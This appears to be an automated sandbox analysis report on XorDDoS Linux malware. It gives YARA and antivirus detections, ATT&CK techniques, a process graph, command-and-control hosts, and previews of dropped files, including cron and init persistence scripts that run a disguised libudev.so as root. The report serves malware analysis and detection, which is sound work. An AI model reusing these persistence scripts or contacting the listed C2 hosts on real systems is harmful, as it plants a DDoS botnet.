            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6428, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6435, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6438, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6440, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6443, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6446, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6452, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6455, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6457, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6460, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6463, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6471, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6474, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6476, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6479, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6482, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6488, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6491, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6493, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6496, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6498, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6505, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6508, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6510, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6513, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: UDMp3dZ7nc.elf PID: 6516, type: MEMORYSTR
            Source: Yara matchFile source: /usr/bin/sosfbbrzmx, type: DROPPED
            Source: Yara matchFile source: /usr/bin/uhjkqkcgma, type: DROPPED
            Source: Yara matchFile source: /usr/bin/vnihfmehfy, type: DROPPED
            Source: Yara matchFile source: /usr/bin/oigyzaiygp, type: DROPPED
            Source: Yara matchFile source: /usr/bin/otlzwyqefc, type: DROPPED
            Source: Yara matchFile source: /usr/bin/ksagqhmoao, type: DROPPED
            Source: Yara matchFile source: /usr/bin/eqoogeqyds, type: DROPPED
            Source: Yara matchFile source: /usr/bin/wutujskjnm, type: DROPPED
            Source: Yara matchFile source: /usr/bin/qxzsiorokf, type: DROPPED
            Source: Yara matchFile source: /usr/bin/gphlkawhxw, type: DROPPED
            Source: Yara matchFile source: /usr/bin/uzqdvpyngy, type: DROPPED
            Source: Yara matchFile source: /usr/lib/libudev.so, type: DROPPED
            Source: Yara matchFile source: /usr/bin/snluqxjnyb, type: DROPPED
            Source: Yara matchFile source: /usr/bin/jeyjdycnpv, type: DROPPED
            Source: Yara matchFile source: /usr/bin/bgoiqqymph, type: DROPPED
            Source: Yara matchFile source: /usr/bin/dthtwwmqvu, type: DROPPED
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information2
            Scripting
            Valid AccountsWindows Management Instrumentation1
            Systemd Service
            1
            Systemd Service
            11
            Masquerading
            OS Credential Dumping1
            Security Software Discovery
            Remote ServicesData from Local System1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Scripting
            Boot or Logon Initialization Scripts1
            Virtualization/Sandbox Evasion
            LSASS Memory1
            Virtualization/Sandbox Evasion
            Remote Desktop ProtocolData from Removable Media1
            Non-Standard Port
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            File Deletion
            Security Account Manager2
            System Information Discovery
            SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
            Application Layer Protocol
            Traffic DuplicationData Destruction
            {"C2 list": ["http://aa.hostasa.org/config.rar\u0000tat456.com:1522", "ppp.gggatat456.com:1522"]}
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Number of created Files
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583792 Sample: UDMp3dZ7nc.elf Startdate: 03/01/2025 Architecture: LINUX Score: 100 72 ppp.gggatat456.com 137.175.90.213, 1522, 55858 PEGTECHINCUS United States 2->72 74 aa.hostasa.org 2->74 76 3 other IPs or domains 2->76 78 Suricata IDS alerts for network traffic 2->78 80 Found malware configuration 2->80 82 Malicious sample detected (through community Yara rule) 2->82 84 6 other signatures 2->84 10 UDMp3dZ7nc.elf 2->10         started        12 systemd snapd-env-generator 2->12         started        signatures3 process4 process5 14 UDMp3dZ7nc.elf 10->14         started        file6 64 /usr/lib/libudev.so, ELF 14->64 dropped 66 /usr/bin/wutujskjnm, ELF 14->66 dropped 68 /usr/bin/vnihfmehfy, ELF 14->68 dropped 70 15 other malicious files 14->70 dropped 92 Drops files in suspicious directories 14->92 94 Sample deletes itself 14->94 96 Sample tries to persist itself using cron 14->96 98 Sample tries to persist itself using System V runlevels 14->98 18 UDMp3dZ7nc.elf sh 14->18         started        22 UDMp3dZ7nc.elf 14->22         started        24 UDMp3dZ7nc.elf 14->24         started        26 110 other processes 14->26 signatures7 process8 file9 62 /etc/crontab, ASCII 18->62 dropped 86 Sample tries to persist itself using cron 18->86 28 sh sed 18->28         started        31 UDMp3dZ7nc.elf oigyzaiygp 22->31         started        33 UDMp3dZ7nc.elf oigyzaiygp 24->33         started        35 UDMp3dZ7nc.elf oigyzaiygp 26->35         started        37 UDMp3dZ7nc.elf oigyzaiygp 26->37         started        39 UDMp3dZ7nc.elf oigyzaiygp 26->39         started        41 107 other processes 26->41 signatures10 process11 signatures12 90 Sample tries to persist itself using cron 28->90 43 oigyzaiygp 31->43         started        46 oigyzaiygp 33->46         started        48 oigyzaiygp 35->48         started        50 oigyzaiygp 37->50         started        52 oigyzaiygp 39->52         started        54 sosfbbrzmx 41->54         started        56 sosfbbrzmx 41->56         started        58 sosfbbrzmx 41->58         started        60 103 other processes 41->60 process13 signatures14 88 Sample deletes itself 43->88
            SourceDetectionScannerLabelLink
            UDMp3dZ7nc.elf66%VirustotalBrowse
            UDMp3dZ7nc.elf68%ReversingLabsLinux.Network.Xor
            UDMp3dZ7nc.elf100%AviraTR/ELF.DDoS.Xor.b
            UDMp3dZ7nc.elf100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            /usr/lib/libudev.so100%AviraTR/ELF.DDoS.Xor.b
            /usr/bin/bgoiqqymph100%AviraTR/ELF.DDoS.Xor.b
            /usr/bin/dthtwwmqvu100%AviraTR/ELF.DDoS.Xor.b
            /usr/bin/eqoogeqyds100%AviraTR/ELF.DDoS.Xor.b
            /usr/bin/otlzwyqefc100%AviraTR/ELF.DDoS.Xor.b
            /usr/bin/vnihfmehfy100%AviraTR/ELF.DDoS.Xor.b
            /usr/bin/ksagqhmoao100%AviraTR/ELF.DDoS.Xor.b
            /usr/bin/oigyzaiygp100%AviraTR/ELF.DDoS.Xor.b
            /usr/bin/sosfbbrzmx100%AviraTR/ELF.DDoS.Xor.b
            /usr/bin/qxzsiorokf100%AviraTR/ELF.DDoS.Xor.b
            /usr/bin/uhjkqkcgma100%AviraTR/ELF.DDoS.Xor.b
            /usr/bin/uzqdvpyngy100%AviraTR/ELF.DDoS.Xor.b
            /usr/bin/snluqxjnyb100%AviraLINUX/Xorddos.misjj
            /usr/bin/gphlkawhxw100%AviraTR/ELF.DDoS.Xor.b
            /usr/bin/jeyjdycnpv100%AviraTR/ELF.DDoS.Xor.b
            /usr/bin/wutujskjnm100%AviraTR/ELF.DDoS.Xor.b
            /usr/lib/libudev.so100%Joe Sandbox ML
            /usr/bin/bgoiqqymph100%Joe Sandbox ML
            /usr/bin/dthtwwmqvu100%Joe Sandbox ML
            /usr/bin/eqoogeqyds100%Joe Sandbox ML
            /usr/bin/otlzwyqefc100%Joe Sandbox ML
            /usr/bin/vnihfmehfy100%Joe Sandbox ML
            /usr/bin/ksagqhmoao100%Joe Sandbox ML
            /usr/bin/oigyzaiygp100%Joe Sandbox ML
            /usr/bin/sosfbbrzmx100%Joe Sandbox ML
            /usr/bin/qxzsiorokf100%Joe Sandbox ML
            /usr/bin/uhjkqkcgma100%Joe Sandbox ML
            /usr/bin/uzqdvpyngy100%Joe Sandbox ML
            /usr/bin/snluqxjnyb100%Joe Sandbox ML
            /usr/bin/gphlkawhxw100%Joe Sandbox ML
            /usr/bin/jeyjdycnpv100%Joe Sandbox ML
            /usr/bin/wutujskjnm100%Joe Sandbox ML
            /etc/cron.hourly/gcc.sh42%ReversingLabsLinux.Network.Xor
            /usr/bin/snluqxjnyb46%ReversingLabsLinux.Network.Xor
            /usr/lib/libudev.so68%ReversingLabsLinux.Network.Xor
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://aa.hostasa.org/config.rar100%Avira URL Cloudmalware
            http://aa.hostasa.org/config.rartat456.com:1522100%Avira URL Cloudmalware
            ppp.gggatat456.com:15220%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            ppp.gggatat456.com
            137.175.90.213
            truetrue
              unknown
              aa.hostasa.org
              unknown
              unknowntrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                http://aa.hostasa.org/config.rartat456.com:1522true
                • Avira URL Cloud: malware
                unknown
                ppp.gggatat456.com:1522true
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://www.gnu.org/software/libc/bugs.htmlUDMp3dZ7nc.elf, libudev.so.13.dr, bgoiqqymph.13.dr, dthtwwmqvu.13.dr, eqoogeqyds.13.dr, otlzwyqefc.13.dr, vnihfmehfy.13.dr, ksagqhmoao.13.dr, oigyzaiygp.13.dr, sosfbbrzmx.13.dr, qxzsiorokf.13.dr, uhjkqkcgma.13.dr, uzqdvpyngy.13.dr, gphlkawhxw.13.dr, jeyjdycnpv.13.dr, wutujskjnm.13.drfalse
                  high
                  http://aa.hostasa.org/config.rarUDMp3dZ7nc.elf, 6260.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6262.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6263.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6264.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6293.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6296.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6298.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6301.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6303.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6311.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6314.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6316.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6319.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6322.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6328.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6331.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6333.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6335.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6338.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6364.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6367.1.00000000ff80b000.00000000ff82c000.rw-.sdmptrue
                  • Avira URL Cloud: malware
                  unknown
                  http://aa.hostasa.org/config.rartat456.com:1522UDMp3dZ7nc.elf, 6260.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6262.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6263.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6264.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6293.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6296.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6298.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6301.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6303.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6311.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6314.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6316.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6319.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6322.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6328.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6331.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6333.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6335.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6338.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6364.1.00000000ff80b000.00000000ff82c000.rw-.sdmp, UDMp3dZ7nc.elf, 6367.1.00000000ff80b000.00000000ff82c000.rw-.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  137.175.90.213
                  ppp.gggatat456.comUnited States
                  54600PEGTECHINCUStrue
                  109.202.202.202
                  unknownSwitzerland
                  13030INIT7CHfalse
                  91.189.91.43
                  unknownUnited Kingdom
                  41231CANONICAL-ASGBfalse
                  91.189.91.42
                  unknownUnited Kingdom
                  41231CANONICAL-ASGBfalse
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                  • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                  91.189.91.43nova2.elfGet hashmaliciousUnknownBrowse
                    154.216.18.23-boatnet.arm7-2025-01-03T11_41_00.elfGet hashmaliciousMiraiBrowse
                      g.elfGet hashmaliciousUnknownBrowse
                        aarch643308.elfGet hashmaliciousUnknownBrowse
                          ARMV7L.elfGet hashmaliciousUnknownBrowse
                            bash.elfGet hashmaliciousUnknownBrowse
                              ARMV5L.elfGet hashmaliciousUnknownBrowse
                                boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                  cedhatGet hashmaliciousKaijiBrowse
                                    arc.elfGet hashmaliciousUnknownBrowse
                                      91.189.91.42nova2.elfGet hashmaliciousUnknownBrowse
                                        154.216.18.23-boatnet.arm7-2025-01-03T11_41_00.elfGet hashmaliciousMiraiBrowse
                                          g.elfGet hashmaliciousUnknownBrowse
                                            aarch643308.elfGet hashmaliciousUnknownBrowse
                                              ARMV7L.elfGet hashmaliciousUnknownBrowse
                                                bash.elfGet hashmaliciousUnknownBrowse
                                                  ARMV5L.elfGet hashmaliciousUnknownBrowse
                                                    boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                      cedhatGet hashmaliciousKaijiBrowse
                                                        arc.elfGet hashmaliciousUnknownBrowse
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          ppp.gggatat456.com1.elfGet hashmaliciousXorDDoSBrowse
                                                          • 142.4.106.74
                                                          iJl2Sb6qRaGet hashmaliciousXorDDoSBrowse
                                                          • 54.36.145.106
                                                          Di1p3oLnDb.elfGet hashmaliciousXorDDoSBrowse
                                                          • 79.137.1.133
                                                          xor1.oGet hashmaliciousXorDDoSBrowse
                                                          • 176.31.91.137
                                                          0Xorddos.oGet hashmaliciousXorDDoSBrowse
                                                          • 54.36.145.106
                                                          XZFWLZVF1ZGet hashmaliciousXorDDoSBrowse
                                                          • 54.36.15.99
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          CANONICAL-ASGBnova2.elfGet hashmaliciousUnknownBrowse
                                                          • 91.189.91.42
                                                          154.216.18.23-boatnet.arm7-2025-01-03T11_41_00.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          g.elfGet hashmaliciousUnknownBrowse
                                                          • 91.189.91.42
                                                          aarch643308.elfGet hashmaliciousUnknownBrowse
                                                          • 91.189.91.42
                                                          ARMV7L.elfGet hashmaliciousUnknownBrowse
                                                          • 91.189.91.42
                                                          bash.elfGet hashmaliciousUnknownBrowse
                                                          • 91.189.91.42
                                                          ARMV5L.elfGet hashmaliciousUnknownBrowse
                                                          • 91.189.91.42
                                                          boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          cedhatGet hashmaliciousKaijiBrowse
                                                          • 91.189.91.42
                                                          arc.elfGet hashmaliciousUnknownBrowse
                                                          • 91.189.91.42
                                                          PEGTECHINCUSHilix.mips.elfGet hashmaliciousMiraiBrowse
                                                          • 45.205.88.197
                                                          http://www.rr8844.comGet hashmaliciousUnknownBrowse
                                                          • 185.200.64.142
                                                          vcimanagement.i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 156.243.156.243
                                                          loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                          • 154.195.93.68
                                                          db0fa4b8db0333367e9bda3ab68b8042.spc.elfGet hashmaliciousMirai, GafgytBrowse
                                                          • 156.247.76.112
                                                          L8RabfF1Hu.exeGet hashmaliciousUnknownBrowse
                                                          • 154.201.87.51
                                                          L8RabfF1Hu.exeGet hashmaliciousUnknownBrowse
                                                          • 154.201.87.51
                                                          jklmips.elfGet hashmaliciousUnknownBrowse
                                                          • 45.205.88.155
                                                          1.elfGet hashmaliciousUnknownBrowse
                                                          • 199.33.215.69
                                                          sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 156.247.76.147
                                                          INIT7CHnova2.elfGet hashmaliciousUnknownBrowse
                                                          • 109.202.202.202
                                                          154.216.18.23-boatnet.arm7-2025-01-03T11_41_00.elfGet hashmaliciousMiraiBrowse
                                                          • 109.202.202.202
                                                          g.elfGet hashmaliciousUnknownBrowse
                                                          • 109.202.202.202
                                                          aarch643308.elfGet hashmaliciousUnknownBrowse
                                                          • 109.202.202.202
                                                          ARMV7L.elfGet hashmaliciousUnknownBrowse
                                                          • 109.202.202.202
                                                          bash.elfGet hashmaliciousUnknownBrowse
                                                          • 109.202.202.202
                                                          ARMV5L.elfGet hashmaliciousUnknownBrowse
                                                          • 109.202.202.202
                                                          boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                          • 109.202.202.202
                                                          cedhatGet hashmaliciousKaijiBrowse
                                                          • 109.202.202.202
                                                          arc.elfGet hashmaliciousUnknownBrowse
                                                          • 109.202.202.202
                                                          No context
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          /etc/cron.hourly/gcc.shHaJTqGiPpDGet hashmaliciousXorDDoSBrowse
                                                            eTASxT3bjO.elfGet hashmaliciousXorDDoSBrowse
                                                              TmoTjBkSXT.elfGet hashmaliciousXorDDoSBrowse
                                                                dptxrnhxmx.elfGet hashmaliciousXorDDoSBrowse
                                                                  1.elfGet hashmaliciousXorDDoSBrowse
                                                                    iJl2Sb6qRaGet hashmaliciousXorDDoSBrowse
                                                                      Di1p3oLnDb.elfGet hashmaliciousXorDDoSBrowse
                                                                        fuck.elfGet hashmaliciousXorDDoSBrowse
                                                                          dkuidbsedpGet hashmaliciousXorDDoSBrowse
                                                                            libudev.soGet hashmaliciousXorDDoSBrowse
                                                                              Process:/tmp/UDMp3dZ7nc.elf
                                                                              File Type:POSIX shell script, ASCII text executable
                                                                              Category:dropped
                                                                              Size (bytes):228
                                                                              Entropy (8bit):4.807897441464882
                                                                              Encrypted:false
                                                                              SSDEEP:3:TKH4v1kxtsLNELQ9YmPQnMLnVMPQmlZnEMFaGZg28Xwf6SkCVcLNGLC75pkVKJdm:htiy4Mrm9lVNy28XbCVP270gJdE/v
                                                                              MD5:3BAB747CEDC5F0EBE86AAA7F982470CD
                                                                              SHA1:3C7D1C6931C2B3DAE39D38346B780EA57C8E6142
                                                                              SHA-256:74D31CAC40D98EE64DF2A0C29CEB229D12AC5FA699C2EE512FC69360F0CF68C5
                                                                              SHA-512:21E8A6D9CA8531D37DEF83D8903E5B0FA11ECF33D85D05EDAB1E0FEB4ACAC65AE2CF5222650FB9F533F459CCC51BB2903276FF6F827B847CC5E6DAC7D45A0A42
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 42%
                                                                              Joe Sandbox View:
                                                                              • Filename: HaJTqGiPpD, Detection: malicious, Browse
                                                                              • Filename: eTASxT3bjO.elf, Detection: malicious, Browse
                                                                              • Filename: TmoTjBkSXT.elf, Detection: malicious, Browse
                                                                              • Filename: dptxrnhxmx.elf, Detection: malicious, Browse
                                                                              • Filename: 1.elf, Detection: malicious, Browse
                                                                              • Filename: iJl2Sb6qRa, Detection: malicious, Browse
                                                                              • Filename: Di1p3oLnDb.elf, Detection: malicious, Browse
                                                                              • Filename: fuck.elf, Detection: malicious, Browse
                                                                              • Filename: dkuidbsedp, Detection: malicious, Browse
                                                                              • Filename: libudev.so, Detection: malicious, Browse
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:#!/bin/sh.PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin.for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done.cp /lib/libudev.so /lib/libudev.so.6./lib/libudev.so.6.
                                                                              Process:/bin/sh
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):41
                                                                              Entropy (8bit):3.8484226636198593
                                                                              Encrypted:false
                                                                              SSDEEP:3:FFP13tKebPv4KFcKv:/P1IebPPFcKv
                                                                              MD5:636299E19F3BFB8CDA661BC956C1CE7F
                                                                              SHA1:2B45273CCBFE139D58FC3554D6943D4338C18E15
                                                                              SHA-256:8CBDE8A027F2887DD7A3C5C6F98FDF127BAE31FE457FEF9D7945C9E48D195F44
                                                                              SHA-512:41AF1A49B86C9C81965AF32B404494CC5072AFDA004F385977110F8EA134A770650CBD2F9617AFCD87D6744954659BE4AE365E65DCA4491A375275E710310F1A
                                                                              Malicious:true
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:*/3 * * * * root /etc/cron.hourly/gcc.sh.
                                                                              Process:/tmp/UDMp3dZ7nc.elf
                                                                              File Type:POSIX shell script, ASCII text executable
                                                                              Category:dropped
                                                                              Size (bytes):335
                                                                              Entropy (8bit):5.346960316467168
                                                                              Encrypted:false
                                                                              SSDEEP:6:hUtoFdU9nysKheJs8BE21YJvmNeMwhwM1DzRI8Q8N6MzPQ8p4:6d/s8BEMO1wuzuJ8NzI8y
                                                                              MD5:6072B870703E8920C2E08A2221EF24F7
                                                                              SHA1:C77C9E9C5EC8AAEC4DC6BFA7AB9C0E671AE4B566
                                                                              SHA-256:A92424FCDBF48A81458FA0937FB2BD7280DEA9B1F22E6D13D945D3EBE943A984
                                                                              SHA-512:8B0C1C493923D691721A3E0A25C0071BAEEA7D3C82D230B1FB5BC959DB1C4FA2DAB47832C76F4966EB1E6D41B86080E227F535B6D754E2AEC6BDFA06386968C9
                                                                              Malicious:true
                                                                              Reputation:low
                                                                              Preview:#!/bin/sh.# chkconfig: 12345 90 90.# description: UDMp3dZ7nc.elf.### BEGIN INIT INFO.# Provides:..UDMp3dZ7nc.elf.# Required-Start:..# Required-Stop:..# Default-Start:.1 2 3 4 5.# Default-Stop:...# Short-Description:.UDMp3dZ7nc.elf.### END INIT INFO.case $1 in.start)../tmp/UDMp3dZ7nc.elf..;;.stop)..;;.*)../tmp/UDMp3dZ7nc.elf..;;.esac.
                                                                              Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):76
                                                                              Entropy (8bit):3.7627880354948586
                                                                              Encrypted:false
                                                                              SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                                              MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                                              SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                                              SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                                              SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                                              Process:/tmp/UDMp3dZ7nc.elf
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):32
                                                                              Entropy (8bit):3.8400182662886326
                                                                              Encrypted:false
                                                                              SSDEEP:3:7TDPGJ2QIGU:xQID
                                                                              MD5:545AAA15453F114F6D027D074D54A3F7
                                                                              SHA1:B9B952F9E5A09CBF4BD71AF78E3049FAE042451B
                                                                              SHA-256:637A7304BB16FE9C7046498803320F086945368EF8DDF9D30D6AF564979E66B7
                                                                              SHA-512:EDC262D4E09F9E4CC255D2E4A1D1E06B12D3F19B80BDFF69C7A042A0E0770BC6F375DBD9220274F33510A9ACA43AE3DA5EEBED60E7D7280DFC8049F186B0C839
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:pdtdvfdbumvoldufbmfvvwvyzmhpzexq
                                                                              Process:/tmp/UDMp3dZ7nc.elf
                                                                              File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                              Category:dropped
                                                                              Size (bytes):548649
                                                                              Entropy (8bit):6.19759343868918
                                                                              Encrypted:false
                                                                              SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojq:/fUywKQ7Fb1pNL/p52fjQn36Euq
                                                                              MD5:36DFBCD1CB8FB95125AF217877D82A82
                                                                              SHA1:E3838A8AB5E18024A85D075377E1934FEC4A51ED
                                                                              SHA-256:CBD186014084AE6161C99C3FA870464A2F8ED5E799F513E905F5ADF0FC38D207
                                                                              SHA-512:A73B23E9EDBA630CBBF35A2D13F89F6469F3E080916A71BD12CF2FAD81A2D6BD03575887A77730A37EF14042A8907FBBF41C866A92632FAA366ED5636E896FE1
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/bgoiqqymph, Author: Joe Security
                                                                              • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/bgoiqqymph, Author: unknown
                                                                              • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/bgoiqqymph, Author: unknown
                                                                              • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/bgoiqqymph, Author: ditekSHen
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
